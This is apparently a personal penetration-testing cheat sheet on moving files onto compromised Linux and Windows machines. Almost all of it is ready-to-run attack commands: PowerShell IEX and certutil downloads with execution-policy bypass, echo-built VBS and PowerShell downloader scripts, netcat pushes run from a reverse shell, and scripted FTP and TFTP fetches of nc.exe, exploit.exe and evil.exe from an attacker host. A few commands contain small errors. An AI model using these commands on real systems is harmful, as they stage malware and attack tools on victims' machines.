My Checklist
smbser.py a path
copy \\ip\a\exploit.exe
Linux Transfer
wget http://IP_ADDR/file -O /path/to/where/you/want/file/to/go
curl http://IP_ADDR/file
fetch http://IP_ADDR/file
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
ftp -s:input.txt
tftp -i get file /path/on/victim
Windows Transfer
bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+)
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
ftp -s:input.txt
tftp -i get file /path/on/victim
powershell.exe -exec bypass -Command "& {iex((New-Object System.Net.WebClient).DownloadFile('http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}"
certutil -urlcache -split -f "http://IP_ADDR/FILE" FILENAME
smbserver
smbserver.py a ~/oscp
Powershell script
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://IP_ADDR/FILE" >> wget.ps1
echo $file = "FILE" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>
VBS
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe
HTTP
# In Kali
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget 10.10.10.10/file
# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
#linux
python -m SimpleHTTPServer 9999
#wget
wget 192.168.1.102:9999/file.txt
#curl
curl -O http://192.168.0.101/file.txt
#ncat
#attacking machine
nc -lvp 4444 < file
#target machine
nc 192.168.1.102 4444 > file
#php
echo "<?php file_put_contents('nameOfFile', fopen('http://ip/file', 'r')); ?>" > down2.php
#tftp
$ tftp 192.168.0.101
tftp> get myfile.txt
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
#scp
# Copy a file:
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
# Copy a directory:
scp -r /path/to/source/dir [email protected]:/path/to/destination
#python
Python SimpleHTTPServer
#on Attacker
python -m SimpleHTTPServer
#on target
wget <attackerip>:8000/filename
------------------------------
Apache
#on Attacker
cp filetosend.txt /var/www/html
service apache2 start
#on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file # on BSD
----------------------------------
Netcat (From Target to Kali)
# Listen on Kali
nc -lvp 4444 > file
# Send from Target machine
nc <kali_ip> 4444 < file
-----------------
Netcat (From Kali to Target)
# on target, wait for the file
nc -nvlp 55555 > file
# on kali, push the file
nc $victimip 55555 < file
----------------------
Extra:
To send the executable file to your machine:
base64 executable
# copy the output
# paste it in a file called file.txt
# decode it and create the executable
base64 -d file.txt > executable
#windows
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://blog.netspi.com/15-ways-to-download-a-file/
certutil -urlcache -f http://ip/1.exe 1.exe
#Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
#VBS
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://attackerip/evil.exe evil.exe
#powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.23/bfill.exe -OutFile C:\Users\kostas\Desktop\bfill.exe"
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"
#FTP
echo open 192.168.1.101 21> ftp.txt
echo USER asshat>> ftp.txt
echo mysecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
#debug
wine exe2bat.exe nc.exe nc.txt
--------------------------------------
TFTP
# Windows XP and Win 2003 include a tftp client; Windows 7 does not by default
# tftp clients are usually non-interactive, so they can work through an obtained shell
atftpd --daemon --port 69 /tftp
Windows> tftp -i ip GET nc.exe
--------------------------------------
FTP (pyftpdlib server on Kali)
# The ftp client is generally installed on Windows machines
# To drive it non-interactively from a script file, use the -s option
# On Kali, install an FTP server and set a username/password
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
# on Windows
ftp <attackerip>
> binary
> get exploit.exe
-------------------------------------------
FTP (pure-ftpd server on Kali)
# on Kali
# install the FTP server
apt-get install pure-ftpd
# create a group
groupadd ftpgroup
# add a user
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# Create a directory for your ftp files (you can also use a per-user directory, e.g. /root/ftphome/bob).
mkdir /root/ftphome
# Create an ftp user, in our example "bob" (again, you can set "-d /root/ftphome/bob/" if you wish).
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
# Update the ftp database after adding our new user.
pure-pw mkdb
# change ownership of the specified ftp directory (and all its sub-directories)
chown -R ftpuser:ftpgroup /root/ftphome
# restart Pure-FTPD
/etc/init.d/pure-ftpd restart
# On Windows
echo open <attackerip> 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
--------------------------------------
Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
--------------------------------------
# Powershell download a file
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"